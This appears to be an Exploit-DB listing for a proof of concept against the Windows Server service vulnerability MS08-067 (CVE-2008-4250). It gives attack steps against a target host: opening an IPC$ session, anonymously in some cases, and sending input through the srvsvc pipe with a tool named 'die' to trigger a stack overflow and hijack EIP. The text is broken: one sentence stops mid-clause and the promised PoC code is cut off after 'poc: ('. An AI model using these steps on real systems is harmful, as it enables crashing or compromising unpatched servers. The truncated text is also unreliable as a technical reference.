Microsoft Windows Server - Code Execution PoC MS08-067

ID EDB-ID:6824
Type exploitdb
Reporter stephen lawler
Modified 2008-10-23T00:00:00


MS Windows Server Service Code Execution PoC (MS08-067). CVE-2008-4250. DoS exploit for the Windows platform.

In a Visual Studio command prompt:

  attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)

  net use \\IPADDRESS\IPC$ /user:user creds
  die \\IPADDRESS \pipe\srvsvc

  In some cases, /user:"" "" will suffice (i.e., anonymous connection)

You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
violation), access violation, etc.  However, in some cases, you will get

This is because the outcome depends on the state of the stack prior to the "overflow":
you need a slash on the stack prior to the input buffer.

So play around a bit; you'll get it working reliably...

poc: (

# [2008-10-23]